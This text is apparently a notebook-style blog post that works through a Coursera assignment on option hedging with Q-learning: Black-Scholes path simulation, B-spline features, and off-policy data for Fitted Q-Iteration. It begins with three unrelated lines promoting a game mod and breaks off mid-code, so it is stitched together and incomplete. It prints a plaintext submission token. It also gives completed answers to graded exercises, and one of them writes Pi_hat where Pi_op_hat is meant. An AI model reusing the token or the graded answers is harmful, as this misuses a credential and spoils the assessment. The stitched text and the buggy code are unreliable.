# Melon Mod

## Huge mod with a big world to explore!

Explore other dimensions on the go or in your chair!
---
layout: post
title: Fitted Q
tags: rl
---

<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>

**Goal:**

- Set up inputs for the batch-RL model
- Implement Fitted Q-Iteration

```python
import numpy as np
import pandas as pd
from scipy.stats import norm
import random
import sys
sys.path.append("..")
import grading
import time
import matplotlib.pyplot as plt
```

```python
### ONLY FOR GRADING. DO NOT EDIT ###
submissions = dict()
assignment_key = "0jn7tioiEeiBAA49aGvLAg"
all_parts = ["wrZFS", "yqg6m", "KY5p8", "BsRWi", "pWxky"]
### ONLY FOR GRADING. DO NOT EDIT ###
```

```python
COURSERA_TOKEN = 'jLCcoh3BbMO5hsCc'  # the key provided to the student on the submission page
COURSERA_EMAIL = '[email protected]'  # the email
```

## Parameters for MC simulation of stock prices

```python
S0 = 100      # initial stock price
mu = 0.05     # drift
sigma = 0.15  # volatility
r = 0.03      # risk-free rate
M = 1         # maturity
T = 6         # number of time steps
N_MC = 10000  # number of paths

delta_t = M / T                # time interval
gamma = np.exp(- r * delta_t)  # discount factor
```

### Black-Scholes Simulation

Simulate $$N_{MC}$$ stock price sample paths with $$T$$ steps by the classical Black-Scholes dynamics

$$dS_t=\mu S_tdt+\sigma S_tdW_t\quad\quad S_{t+1}=S_te^{\left(\mu-\frac{1}{2}\sigma^2\right)\Delta t+\sigma\sqrt{\Delta t}Z}$$

where $$Z$$ is a standard normal random variable.

Based on the simulated stock price paths $$S_t$$, compute the state variable $$X_t$$ by the relation

$$X_t=-\left(\mu-\frac{1}{2}\sigma^2\right)t\Delta t+\log S_t$$

Also compute

$$\Delta S_t=S_{t+1}-e^{r\Delta t}S_t\quad\quad \Delta\hat{S}_t=\Delta S_t-\Delta\bar{S}_t\quad\quad t=0,...,T-1$$

where $$\Delta\bar{S}_t$$ is the sample mean of all values of $$\Delta S_t$$.

Plots of stock price $$S_t$$ and state variable $$X_t$$ sample paths are shown below.

```python
# make a dataset
starttime = time.time()
np.random.seed(42)  # fix random seed

# stock price
S = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1))
S.loc[:,0] = S0

# standard normal random numbers
RN = pd.DataFrame(np.random.randn(N_MC,T), index=range(1, N_MC+1), columns=range(1, T+1))

for t in range(1, T+1):
    S.loc[:,t] = S.loc[:,t-1] * np.exp((mu - 1/2 * sigma**2) * delta_t + sigma * np.sqrt(delta_t) * RN.loc[:,t])

delta_S = S.loc[:,1:T].values - np.exp(r * delta_t) * S.loc[:,0:T-1]
delta_S_hat = delta_S.apply(lambda x: x - np.mean(x), axis=0)

# state variable
X = - (mu - 1/2 * sigma**2) * np.arange(T+1) * delta_t + np.log(S)  # delta_t here is due to their conventions

endtime = time.time()
print('\nTime Cost:', endtime - starttime, 'seconds')

# plot 10 paths
step_size = N_MC // 10
idx_plot = np.arange(step_size, N_MC, step_size)
plt.plot(S.T.iloc[:, idx_plot])
plt.xlabel('Time Steps')
plt.title('Stock Price Sample Paths')
plt.show()

plt.plot(X.T.iloc[:, idx_plot])
plt.xlabel('Time Steps')
plt.ylabel('State Variable')
plt.show()
```

    Time Cost: 0.0767676830291748 seconds

![png](/assets/img/rlhedge/unit3/output_8_1.png)

![png](/assets/img/rlhedge/unit3/output_8_2.png)
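As a quick sanity check on the simulation (an addition to the original notebook, not part of the assignment), the sample mean of the simulated terminal prices can be compared against the closed-form GBM expectation $$E\left[S_T\right]=S_0e^{\mu M}$$:

```python
# Sanity-check sketch: under GBM, E[S_T] = S0 * exp(mu * M)
print('simulated mean of S_T:', np.mean(S.iloc[:, -1]))
print('theoretical E[S_T]   :', S0 * np.exp(mu * M))  # 100 * exp(0.05) ~ 105.13
```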
Define the function *terminal_payoff* to compute the terminal payoff of a European put option,

$$H_T\left(S_T\right)=\max\left(K-S_T,0\right)$$

```python
def terminal_payoff(ST, K):
    # ST   final stock price
    # K    strike
    payoff = max(K - ST, 0)
    return payoff
```

## Define spline basis functions

```python
import bspline
import bspline.splinelab as splinelab

X_min = np.min(np.min(X))
X_max = np.max(np.max(X))
print('X.shape = ', X.shape)
print('X_min, X_max = ', X_min, X_max)

p = 4        # order of spline (p = 4 gives cubic B-splines)
ncolloc = 12
tau = np.linspace(X_min, X_max, ncolloc)  # these are the sites to which we would like to interpolate

# k is a knot vector that adds endpoint repeats as appropriate for a spline of order p
# To get meaningful results, one should have ncolloc >= p+1
k = splinelab.aptknt(tau, p)

# Spline basis of order p on knots k
basis = bspline.Bspline(k, p)

f = plt.figure()
# B = bspline.Bspline(k, p)  # Spline basis functions
print('Number of points k = ', len(k))
basis.plot()
plt.savefig('Basis_functions.png', dpi=600)
```

    X.shape =  (10000, 7)
    X_min, X_max =  4.05752797076 5.16206652917
    Number of points k =  17

![png](/assets/img/rlhedge/unit3/output_12_1.png)

```python
type(basis)
```

    bspline.bspline.Bspline

```python
X.values.shape
```

    (10000, 7)

### Make data matrices with feature values

"Features" here are the values of the basis functions at the data points. The outputs are 3D arrays of dimensions num_t_steps x num_MC x num_basis.

```python
num_t_steps = T + 1
num_basis = ncolloc  # len(k) #

data_mat_t = np.zeros((num_t_steps, N_MC, num_basis))
print('num_basis = ', num_basis)
print('dim data_mat_t = ', data_mat_t.shape)

# fill it: expand the function in a finite-dimensional space
# (in a neural network, the basis is the neural network itself)
t_0 = time.time()
for i in np.arange(num_t_steps):
    x = X.values[:,i]
    data_mat_t[i,:,:] = np.array([ basis(el) for el in x ])
t_end = time.time()
print('Computational time:', t_end - t_0, 'seconds')
```

    num_basis =  12
    dim data_mat_t =  (7, 10000, 12)
    Computational time: 13.818428993225098 seconds

```python
# save these data matrices for future re-use
np.save('data_mat_m=r_A_%d' % N_MC, data_mat_t)
```

```python
print(data_mat_t.shape)  # shape num_steps x N_MC x num_basis
print(len(k))
```

    (7, 10000, 12)
    17

## Dynamic Programming solution for QLBS

The MDP problem in this case is to solve the following Bellman optimality equation for the action-value function

$$Q_t^\star\left(x,a\right)=\mathbb{E}_t\left[R_t\left(X_t,a_t,X_{t+1}\right)+\gamma\max_{a_{t+1}\in\mathcal{A}}Q_{t+1}^\star\left(X_{t+1},a_{t+1}\right)\space|\space X_t=x,a_t=a\right],\space\space t=0,...,T-1,\quad\gamma=e^{-r\Delta t}$$

where $$R_t\left(X_t,a_t,X_{t+1}\right)$$ is the one-step time-dependent random reward and $$a_t\left(X_t\right)$$ is the action (hedge). Detailed steps for solving this equation by Dynamic Programming are illustrated below.

With the set of basis functions $$\left\{\Phi_n\left(X_t^k\right)\right\}_{n=1}^N$$, expand the optimal action (hedge) $$a_t^\star\left(X_t\right)$$ and the optimal Q-function $$Q_t^\star\left(X_t,a_t^\star\right)$$ in basis functions with time-dependent coefficients:

$$a_t^\star\left(X_t\right)=\sum_n^N{\phi_{nt}\Phi_n\left(X_t\right)}\quad\quad Q_t^\star\left(X_t,a_t^\star\right)=\sum_n^N{\omega_{nt}\Phi_n\left(X_t\right)}$$

The coefficients $$\phi_{nt}$$ and $$\omega_{nt}$$ are computed recursively backward in time for $$t=T-1,...,0$$.
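In code, once a coefficient vector is known, evaluating such an expansion on every Monte Carlo path at a given time step is a single matrix-vector product (an illustrative sketch added here, not part of the original notebook; `phi_t` is a hypothetical coefficient vector used only for shapes):

```python
# Sketch: evaluate sum_n phi_nt * Phi_n(X_t^k) for all paths k at t = 0.
phi_t = np.ones(num_basis)                # hypothetical coefficients, for illustration
a_t = np.dot(data_mat_t[0, :, :], phi_t)  # data_mat_t[0] has shape (N_MC, num_basis)
print(a_t.shape)                          # (10000,)
```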
Coefficients for the expansion of the optimal action $$a_t^\star\left(X_t\right)$$ are solved by

$$\phi_t=\mathbf A_t^{-1}\mathbf B_t$$

where $$\mathbf A_t$$ and $$\mathbf B_t$$ are a matrix and a vector, respectively, with elements given by

$$A_{nm}^{\left(t\right)}=\sum_{k=1}^{N_{MC}}{\Phi_n\left(X_t^k\right)\Phi_m\left(X_t^k\right)\left(\Delta\hat{S}_t^k\right)^2}\quad\quad B_n^{\left(t\right)}=\sum_{k=1}^{N_{MC}}{\Phi_n\left(X_t^k\right)\left[\hat\Pi_{t+1}^k\Delta\hat{S}_t^k+\frac{1}{2\gamma\lambda}\Delta S_t^k\right]}$$

Define functions *function_A* and *function_B* to compute the values of the matrix $$\mathbf A_t$$ and the vector $$\mathbf B_t$$.

## Define the option strike and risk aversion parameter

```python
risk_lambda = 0.001  # risk aversion
K = 100              # option strike

# Note that we set coef=0 below in function function_B_vec. This corresponds to pure risk-based hedging.
```

## Part 1: Implement functions to compute optimal hedges

**Instructions:** Copy-paste the implementations from the previous (QLBS) assignment, as these are the same functions.

```python
# functions to compute optimal hedges
def function_A_vec(t, delta_S_hat, data_mat, reg_param):
    """
    function_A_vec - compute the matrix A_{nm} from Eq. (52) (with a regularization!)
    Eq. (52) in QLBS Q-Learner in the Black-Scholes-Merton article

    Arguments:
    t - time index, a scalar, an index into time axis of data_mat
    delta_S_hat - pandas.DataFrame of dimension N_MC x T
    data_mat - pandas.DataFrame of dimension T x N_MC x num_basis
    reg_param - a scalar, regularization parameter

    Return:
    - np.array, i.e. matrix A_{nm} of dimension num_basis x num_basis
    """
    ### START CODE HERE ### (≈ 5-6 lines of code)
    X_mat = data_mat[t, :, :]
    num_basis_funcs = X_mat.shape[1]
    this_dS = delta_S_hat.loc[:, t]
    hat_dS2 = (this_dS ** 2).reshape(-1, 1)
    A_mat = np.dot(X_mat.T, X_mat * hat_dS2) + reg_param * np.eye(num_basis_funcs)
    ### END CODE HERE ###
    return A_mat


def function_B_vec(t, Pi_hat, delta_S_hat=delta_S_hat, S=S, data_mat=data_mat_t, gamma=gamma, risk_lambda=risk_lambda):
    """
    function_B_vec - compute the vector B_{n} from Eq. (52)
    QLBS Q-Learner in the Black-Scholes-Merton article

    Arguments:
    t - time index, a scalar, an index into time axis of delta_S_hat
    Pi_hat - pandas.DataFrame of dimension N_MC x T of portfolio values
    delta_S_hat - pandas.DataFrame of dimension N_MC x T
    S - pandas.DataFrame of simulated stock prices
    data_mat - pandas.DataFrame of dimension T x N_MC x num_basis
    gamma - one time-step discount factor $exp(-r \delta t)$
    risk_lambda - risk aversion coefficient, a small positive number

    Return:
    B_vec - np.array() of dimension num_basis x 1
    """
    # coef = 1.0/(2 * gamma * risk_lambda)
    # override it by zero to have a pure risk hedge
    coef = 0.  # keep it

    ### START CODE HERE ### (≈ 3-4 lines of code)
    tmp = Pi_hat.loc[:,t+1] * delta_S_hat.loc[:, t]
    X_mat = data_mat[t, :, :]  # matrix of dimension N_MC x num_basis
    B_vec = np.dot(X_mat.T, tmp)
    ### END CODE HERE ###
    return B_vec
```
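A small numerical aside (my addition, using synthetic stand-in data rather than the notebook's variables): since $$\mathbf A_t$$ is a regularized Gram matrix and hence symmetric positive definite, `np.linalg.solve` is a cheaper and more stable way to obtain $$\phi_t$$ than the explicit matrix inverse used in the loop below:

```python
# Sketch with synthetic stand-ins shaped like A_t and B_t above.
rng = np.random.default_rng(0)
Phi = rng.standard_normal((1000, 12))        # stand-in for basis values, N_MC x num_basis
w = rng.standard_normal(1000) ** 2           # stand-in for the (Delta S_hat_t)^2 weights
A_mat = Phi.T @ (Phi * w[:, None]) + 1e-3 * np.eye(12)  # regularized weighted Gram matrix
B_vec = Phi.T @ rng.standard_normal(1000)
phi = np.linalg.solve(A_mat, B_vec)          # same result as inv(A_mat) @ B_vec, more stable
```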
## Compute optimal hedge and portfolio value

Call *function_A* and *function_B* for $$t=T-1,...,0$$ together with the basis functions $$\Phi_n\left(X_t\right)$$ to compute the optimal action $$a_t^\star\left(X_t\right)=\sum_n^N{\phi_{nt}\Phi_n\left(X_t\right)}$$ backward recursively with terminal condition $$a_T^\star\left(X_T\right)=0$$.

Once the optimal hedge $$a_t^\star\left(X_t\right)$$ is computed, the portfolio value $$\Pi_t$$ can also be computed backward recursively by

$$\Pi_t=\gamma\left[\Pi_{t+1}-a_t^\star\Delta S_t\right]\quad t=T-1,...,0$$

together with the terminal condition $$\Pi_T=H_T\left(S_T\right)=\max\left(K-S_T,0\right)$$ for a European put option.

Also compute $$\hat{\Pi}_t=\Pi_t-\bar{\Pi}_t$$, where $$\bar{\Pi}_t$$ is the sample mean of all values of $$\Pi_t$$.

```python
starttime = time.time()

# portfolio value
Pi = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1))
Pi.iloc[:,-1] = S.iloc[:,-1].apply(lambda x: terminal_payoff(x, K))

Pi_hat = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1))
Pi_hat.iloc[:,-1] = Pi.iloc[:,-1] - np.mean(Pi.iloc[:,-1])

# optimal hedge
a = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1))
a.iloc[:,-1] = 0

reg_param = 1e-3
for t in range(T-1, -1, -1):
    A_mat = function_A_vec(t, delta_S_hat, data_mat_t, reg_param)
    B_vec = function_B_vec(t, Pi_hat, delta_S_hat, S, data_mat_t)
    # print('t =', t, 'A_mat.shape =', A_mat.shape, 'B_vec.shape =', B_vec.shape)
    phi = np.dot(np.linalg.inv(A_mat), B_vec)

    a.loc[:,t] = np.dot(data_mat_t[t,:,:], phi)
    Pi.loc[:,t] = gamma * (Pi.loc[:,t+1] - a.loc[:,t] * delta_S.loc[:,t])
    Pi_hat.loc[:,t] = Pi.loc[:,t] - np.mean(Pi.loc[:,t])

a = a.astype('float')
Pi = Pi.astype('float')
Pi_hat = Pi_hat.astype('float')

endtime = time.time()
print('Computational time:', endtime - starttime, 'seconds')
```

    /opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:21: FutureWarning: reshape is deprecated and will raise in a subsequent release. Please use .values.reshape(...) instead

    Computational time: 3.004925489425659 seconds

Plots of optimal hedge $$a_t^\star$$ and portfolio value $$\Pi_t$$ sample paths are shown below.

```python
# plot 10 paths
plt.plot(a.T.iloc[:,idx_plot])
plt.xlabel('Time Steps')
plt.title('Optimal Hedge')
plt.show()

plt.plot(Pi.T.iloc[:,idx_plot])
plt.xlabel('Time Steps')
plt.title('Portfolio Value')
plt.show()
```

![png](/assets/img/rlhedge/unit3/output_30_0.png)

![png](/assets/img/rlhedge/unit3/output_30_1.png)

Once the optimal hedge $$a_t^\star$$ and portfolio value $$\Pi_t$$ are computed, the reward function $$R_t\left(X_t,a_t,X_{t+1}\right)$$ can then be computed by

$$R_t\left(X_t,a_t,X_{t+1}\right)=\gamma a_t\Delta S_t-\lambda Var\left[\Pi_t\space|\space\mathcal F_t\right]\quad t=0,...,T-1$$

with terminal condition $$R_T=-\lambda Var\left[\Pi_T\right]$$.

## Part 2: Compute the optimal Q-function with the DP approach

Coefficients for the expansion of the optimal Q-function $$Q_t^\star\left(X_t,a_t^\star\right)$$ are solved by

$$\omega_t=\mathbf C_t^{-1}\mathbf D_t$$

where $$\mathbf C_t$$ and $$\mathbf D_t$$ are a matrix and a vector, respectively, with elements given by

$$C_{nm}^{\left(t\right)}=\sum_{k=1}^{N_{MC}}{\Phi_n\left(X_t^k\right)\Phi_m\left(X_t^k\right)}\quad\quad D_n^{\left(t\right)}=\sum_{k=1}^{N_{MC}}{\Phi_n\left(X_t^k\right)\left(R_t\left(X_t,a_t^\star,X_{t+1}\right)+\gamma\max_{a_{t+1}\in\mathcal{A}}Q_{t+1}^\star\left(X_{t+1},a_{t+1}\right)\right)}$$

Define functions *function_C* and *function_D* to compute the values of the matrix $$\mathbf C_t$$ and the vector $$\mathbf D_t$$.

**Instructions:** Copy-paste the implementations from the previous (QLBS) assignment, as these are the same functions.

```python
def function_C_vec(t, data_mat, reg_param):
    """
    function_C_vec - calculate the C_{nm} matrix from Eq. (56) (with a regularization!)
    Eq. (56) in QLBS Q-Learner in the Black-Scholes-Merton article

    Arguments:
    t - time index, a scalar, an index into time axis of data_mat
    data_mat - pandas.DataFrame of values of basis functions of dimension T x N_MC x num_basis
    reg_param - regularization parameter, a scalar

    Return:
    C_mat - np.array of dimension num_basis x num_basis
    """
    ### START CODE HERE ### (≈ 5-6 lines of code)
    X_mat = data_mat[t, :, :]
    num_basis_funcs = X_mat.shape[1]
    C_mat = np.dot(X_mat.T, X_mat) + reg_param * np.eye(num_basis_funcs)
    ### END CODE HERE ###
    return C_mat


def function_D_vec(t, Q, R, data_mat, gamma=gamma):
    """
    function_D_vec - calculate the D_{n} vector from Eq. (56) (with a regularization!)
    Eq. (56) in QLBS Q-Learner in the Black-Scholes-Merton article

    Arguments:
    t - time index, a scalar, an index into time axis of data_mat
    Q - pandas.DataFrame of Q-function values of dimension N_MC x T
    R - pandas.DataFrame of rewards of dimension N_MC x T
    data_mat - pandas.DataFrame of values of basis functions of dimension T x N_MC x num_basis
    gamma - one time-step discount factor $exp(-r \delta t)$

    Return:
    D_vec - np.array of dimension num_basis x 1
    """
    ### START CODE HERE ### (≈ 2-3 lines of code)
    X_mat = data_mat[t, :, :]
    D_vec = np.dot(X_mat.T, R.loc[:,t] + gamma * Q.loc[:, t+1])
    ### END CODE HERE ###
    return D_vec
```

Call *function_C* and *function_D* for $$t=T-1,...,0$$ together with the basis functions $$\Phi_n\left(X_t\right)$$ to compute the optimal Q-function $$Q_t^\star\left(X_t,a_t^\star\right)=\sum_n^N{\omega_{nt}\Phi_n\left(X_t\right)}$$ backward recursively with terminal condition $$Q_T^\star\left(X_T,a_T=0\right)=-\Pi_T\left(X_T\right)-\lambda Var\left[\Pi_T\left(X_T\right)\right]$$.

Compare the QLBS price to the European put price given by the Black-Scholes formula,

$$C_t^{\left(BS\right)}=Ke^{-r\left(T-t\right)}\mathcal N\left(-d_2\right)-S_t\mathcal N\left(-d_1\right)$$

```python
# The Black-Scholes prices
def bs_put(t, S0=S0, K=K, r=r, sigma=sigma, T=M):
    d1 = (np.log(S0/K) + (r + 1/2 * sigma**2) * (T-t)) / sigma / np.sqrt(T-t)
    d2 = (np.log(S0/K) + (r - 1/2 * sigma**2) * (T-t)) / sigma / np.sqrt(T-t)
    price = K * np.exp(-r * (T-t)) * norm.cdf(-d2) - S0 * norm.cdf(-d1)
    return price

def bs_call(t, S0=S0, K=K, r=r, sigma=sigma, T=M):
    d1 = (np.log(S0/K) + (r + 1/2 * sigma**2) * (T-t)) / sigma / np.sqrt(T-t)
    d2 = (np.log(S0/K) + (r - 1/2 * sigma**2) * (T-t)) / sigma / np.sqrt(T-t)
    price = S0 * norm.cdf(d1) - K * np.exp(-r * (T-t)) * norm.cdf(d2)
    return price
```
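For the parameters above, evaluating the put at $$t=0$$ gives the Black-Scholes benchmark quoted in the summary at the end of the notebook (a one-line usage example added here):

```python
print('BS put price at t=0:', bs_put(0))  # ~ 4.5296 for the parameters above
```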
## Hedging and Pricing with Reinforcement Learning

Implement batch-mode, off-policy, model-free Q-Learning by Fitted Q-Iteration. The only data available is a set of $$N_{MC}$$ paths of the underlying state variable $$X_t$$, hedge position $$a_t$$, instantaneous reward $$R_t$$ and the next-time value $$X_{t+1}$$:

$$\mathcal F_t^k=\left\{\left(X_t^k,a_t^k,R_t^k,X_{t+1}^k\right)\right\}_{t=0}^{T-1}\quad k=1,...,N_{MC}$$

Detailed steps for solving the Bellman optimality equation by Reinforcement Learning are illustrated below.

Expand the Q-function in basis functions with time-dependent coefficients parametrized by a matrix $$\mathbf W_t$$:

$$Q_t^\star\left(X_t,a_t\right)=\mathbf A_t^T\mathbf W_t\Phi\left(X_t\right)=\mathbf A_t^T\mathbf U_W\left(t,X_t\right)=\vec{W}_t^T \vec{\Psi}\left(X_t,a_t\right)$$

$$\mathbf A_t=\left(\begin{matrix}1\\a_t\\\frac{1}{2}a_t^2\end{matrix}\right)\quad\mathbf U_W\left(t,X_t\right)=\mathbf W_t\Phi\left(X_t\right)$$

where $$\vec{W}_t$$ is obtained by concatenating the columns of the matrix $$\mathbf W_t$$, while $$\vec{\Psi}\left(X_t,a_t\right)=vec\left(\mathbf A_t\otimes\mathbf\Phi^T\left(X\right)\right)$$ stands for the vector obtained by concatenating the columns of the outer product of the vectors $$\mathbf A_t$$ and $$\mathbf\Phi\left(X\right)$$.

Compute the vector $$\mathbf A_t$$, then compute $$\vec\Psi\left(X_t,a_t\right)$$ for each $$X_t^k$$ and store it indexed by path and time $$\left[k,t\right]$$.

## Part 3: Make off-policy data

- **on-policy** data - contains the optimal action and the corresponding reward
- **off-policy** data - contains a random action and the corresponding reward

Given a large enough sample, i.e. $$N_{MC}$$ tending to infinity, the Q-Learner will learn an optimal policy from the data in a model-free setting. In our case a random action is the optimal action multiplied by noise sampled from a uniform distribution:

$$a_t\left(X_t\right) = a_t^\star\left(X_t\right)\,u_t \quad\quad u_t\sim U\left[1-\eta,\,1+\eta\right]$$

where $$\eta$$ is a disturbance level. In other words, each noisy action is calculated by taking the optimal action computed previously and multiplying it by a uniform random variable in the interval $$\left[1-\eta, 1+\eta\right]$$.

**Instructions:** In the loop below:

- Compute the optimal policy, and write the result to a_op
- Disturb these values by the random noise $$a_t\left(X_t\right) = a_t^\star\left(X_t\right)\,u_t$$ with $$u_t\sim U\left[1-\eta,\,1+\eta\right]$$
- Compute portfolio values corresponding to the observed actions, $$\Pi_t=\gamma\left[\Pi_{t+1}-a_t\Delta S_t\right]\quad t=T-1,...,0$$
- Compute rewards corresponding to the observed actions, $$R_t\left(X_t,a_t,X_{t+1}\right)=\gamma a_t\Delta S_t-\lambda Var\left[\Pi_t\space|\space\mathcal F_t\right]\quad t=T-1,...,0$$ with terminal condition $$R_T=-\lambda Var\left[\Pi_T\right]$$

```python
eta = 0.5  # disturbance level; also tried: 0.05, 0.1, 0.15, 0.25
reg_param = 1e-3
np.random.seed(42)  # fix random seed

# disturbed optimal actions to be computed
a_op = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1))
a_op.iloc[:,-1] = 0

# also make portfolios and rewards
# portfolio value
Pi_op = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1))
Pi_op.iloc[:,-1] = S.iloc[:,-1].apply(lambda x: terminal_payoff(x, K))

Pi_op_hat = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1))
Pi_op_hat.iloc[:,-1] = Pi_op.iloc[:,-1] - np.mean(Pi_op.iloc[:,-1])

# reward function
R_op = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1))
R_op.iloc[:,-1] = - risk_lambda * np.var(Pi_op.iloc[:,-1])

# The backward loop
for t in range(T-1, -1, -1):
    ### START CODE HERE ### (≈ 11-12 lines of code)
    # 1. Compute the optimal policy, and write the result to a_op
    a_op.loc[:, t] = a.loc[:, t]
    # 2. Now disturb these values by a random noise
    a_op.loc[:, t] *= np.random.uniform(1 - eta, 1 + eta, size=a_op.shape[0])
    # 3. Compute portfolio values corresponding to observed actions
    Pi_op.loc[:,t] = gamma * (Pi_op.loc[:,t+1] - a_op.loc[:,t] * delta_S.loc[:,t])
    Pi_hat.loc[:,t] = Pi_op.loc[:,t] - np.mean(Pi_op.loc[:,t])
    # 4. Compute rewards corresponding to observed actions
    R_op.loc[:,t] = gamma * a_op.loc[:,t] * delta_S.loc[:,t] - risk_lambda * np.var(Pi_op.loc[:,t])
    ### END CODE HERE ###

print('done with backward loop!')
```

    done with backward loop!
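Since the multiplicative noise $$u_t$$ has mean one, the disturbed actions should be unbiased around the optimal DP hedges. A quick check (my addition, not part of the original notebook):

```python
# Sketch: a_op was built as a * u with u ~ U[1-eta, 1+eta] and E[u] = 1,
# so the elementwise ratio a_op / a should average to about 1.
print(np.mean(a_op.loc[:, 0] / a.loc[:, 0]))  # expected to be close to 1
```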
```python
### GRADED PART (DO NOT EDIT) ###
np.random.seed(42)
idx_row = np.random.randint(low=0, high=R_op.shape[0], size=10)
np.random.seed(42)
idx_col = np.random.randint(low=0, high=R_op.shape[1], size=10)

part_1 = list(R_op.loc[idx_row, idx_col].values.flatten())
try:
    part1 = " ".join(map(repr, part_1))
except TypeError:
    part1 = repr(part_1)
submissions[all_parts[0]] = part1
grading.submit(COURSERA_EMAIL, COURSERA_TOKEN, assignment_key, all_parts[:1], all_parts, submissions)
R_op.loc[idx_row, idx_col].values.flatten()
### GRADED PART (DO NOT EDIT) ###
```

    Submission successful, please check on the coursera grader page for the status

    array([ -4.41648229e-02, -1.11627835e+00, -3.26618627e-01, -4.41648229e-02,
             1.86629772e-01, -3.26618627e-01, -3.26618627e-01, -4.41648229e-02,
            -1.91643174e+00,  1.86629772e-01, -4.41648229e-02, -1.15471981e+01,
             8.36214406e-03, -4.41648229e-02, -5.19860756e-01,  8.36214406e-03,
             8.36214406e-03, -4.41648229e-02, -5.82629891e-02, -5.19860756e-01,
            -4.41648229e-02, -2.93024596e+00, -6.70591047e-01, -4.41648229e-02,
             3.38303735e-01, -6.70591047e-01, -6.70591047e-01, -4.41648229e-02,
            -1.35776224e-01,  3.38303735e-01, -4.41648229e-02,  3.89179538e-02,
            -2.11256164e+00, -4.41648229e-02, -8.62139383e-01, -2.11256164e+00,
            -2.11256164e+00, -4.41648229e-02,  1.03931641e+00, -8.62139383e-01,
            -4.41648229e-02, -3.88581528e+00, -2.78664643e-01, -4.41648229e-02,
             1.08026845e+00, -2.78664643e-01, -2.78664643e-01, -4.41648229e-02,
            -1.59815566e-01,  1.08026845e+00, -4.41648229e-02,  1.34127261e+00,
            -1.32542466e+00, -4.41648229e-02, -1.75711669e-01, -1.32542466e+00,
            -1.32542466e+00, -4.41648229e-02, -6.89031647e-01, -1.75711669e-01,
            -4.41648229e-02,  1.36065847e+00, -4.83656917e-03, -4.41648229e-02,
             1.01545031e+00, -4.83656917e-03, -4.83656917e-03, -4.41648229e-02,
             1.06509261e+00,  1.01545031e+00, -4.41648229e-02, -5.48069399e-01,
             6.69233272e+00, -4.41648229e-02,  2.48031088e+00,  6.69233272e+00,
             6.69233272e+00, -4.41648229e-02, -4.96873017e-01,  2.48031088e+00,
            -4.41648229e-02,  1.05762523e+00, -5.25381441e+00, -4.41648229e-02,
            -3.93284570e+00, -5.25381441e+00, -5.25381441e+00, -4.41648229e-02,
            -1.75980494e-01, -3.93284570e+00, -4.41648229e-02, -1.12194921e-01,
            -2.04245741e-02, -4.41648229e-02, -2.95192215e-01, -2.04245741e-02,
            -2.04245741e-02, -4.41648229e-02, -1.70008788e+00, -2.95192215e-01])

```python
### GRADED PART (DO NOT EDIT) ###
np.random.seed(42)
idx_row = np.random.randint(low=0, high=Pi_op.shape[0], size=10)
np.random.seed(42)
idx_col = np.random.randint(low=0, high=Pi_op.shape[1], size=10)

part_2 = list(Pi_op.loc[idx_row, idx_col].values.flatten())
try:
    part2 = " ".join(map(repr, part_2))
except TypeError:
    part2 = repr(part_2)
submissions[all_parts[1]] = part2
grading.submit(COURSERA_EMAIL, COURSERA_TOKEN, assignment_key, all_parts[:2], all_parts, submissions)
Pi_op.loc[idx_row, idx_col].values.flatten()
### GRADED PART (DO NOT EDIT) ###
```

    Submission successful, please check on the coursera grader page for the status

    array([  0.        ,  1.42884104,  0.33751419,  0.        ,  1.21733506,
             0.33751419,  0.33751419,  0.        ,  3.11498207,  1.21733506,
             0.        , 11.42133749, -0.10310673,  0.        , 11.86648425,
            -0.10310673, -0.10310673,  0.        , 11.85284966, 11.86648425,
             0.        ,  3.77013248,  0.86748124,  0.        ,  3.39527529,
             0.86748124,  0.86748124,  0.        ,  3.50140426,  3.39527529,
             0.        ,  2.37907167,  2.45349463,  0.        ,  3.21159555,
             2.45349463,  2.45349463,  0.        ,  2.143548  ,  3.21159555,
             0.        ,  4.22816728,  0.36745282,  0.        ,  3.10906092,
             0.36745282,  0.36745282,  0.        ,  3.24065673,  3.10906092,
             0.        ,  1.4213709 ,  2.79987609,  0.        ,  1.57224362,
             2.79987609,  2.79987609,  0.        ,  2.24072042,  1.57224362,
             9.05061694,  4.48960086,  5.90296866,  9.05061694,  3.43400874,
             5.90296866,  5.90296866,  9.05061694,  2.3390757 ,  3.43400874,
            11.39022164,  5.65090831,  5.15180177, 11.39022164,  3.12466356,
             5.15180177,  5.15180177, 11.39022164,  3.59323901,  3.12466356,
             0.        ,  3.05819303,  4.15983366,  0.        ,  6.95803609,
             4.15983366,  4.15983366,  0.        ,  7.08659999,  6.95803609,
             0.        ,  0.12024876,  0.03147899,  0.        ,  0.3970914 ,
             0.03147899,  0.03147899,  0.        ,  2.08248553,  0.3970914 ])

## Override on-policy data with off-policy data

```python
# Override on-policy data with off-policy data
a = a_op.copy()            # disturbed actions
Pi = Pi_op.copy()          # disturbed portfolio values
Pi_hat = Pi_op_hat.copy()
R = R_op.copy()
```

```python
# make matrix A_t of shape (3 x num_MC x num_steps)
num_MC = a.shape[0]  # number of simulated paths
num_TS = a.shape[1]  # number of time steps
a_1_1 = a.values.reshape((1, num_MC, num_TS))
a_1_2 = 0.5 * a_1_1**2
ones_3d = np.ones((1, num_MC, num_TS))
A_stack = np.vstack((ones_3d, a_1_1, a_1_2))
print(A_stack.shape)
```

    (3, 10000, 7)

```python
data_mat_swap_idx = np.swapaxes(data_mat_t, 0, 2)
print(data_mat_swap_idx.shape)  # (12, 10000, 7)

# expand dimensions of matrices to multiply element-wise
A_2 = np.expand_dims(A_stack, axis=1)  # becomes (3, 1, 10000, 7)
data_mat_swap_idx = np.expand_dims(data_mat_swap_idx, axis=0)  # becomes (1, 12, 10000, 7)

Psi_mat = np.multiply(A_2, data_mat_swap_idx)
# this is a matrix of size 3 x num_basis x num_MC x num_steps

# now concatenate columns along the first dimension
# Psi_mat = Psi_mat.reshape(-1, a.shape[0], a.shape[1], order='F')
Psi_mat = Psi_mat.reshape(-1, N_MC, T+1, order='F')
print(Psi_mat.shape)
```

    (12, 10000, 7)
    (36, 10000, 7)

```python
# make matrix S_t
Psi_1_aux = np.expand_dims(Psi_mat, axis=1)
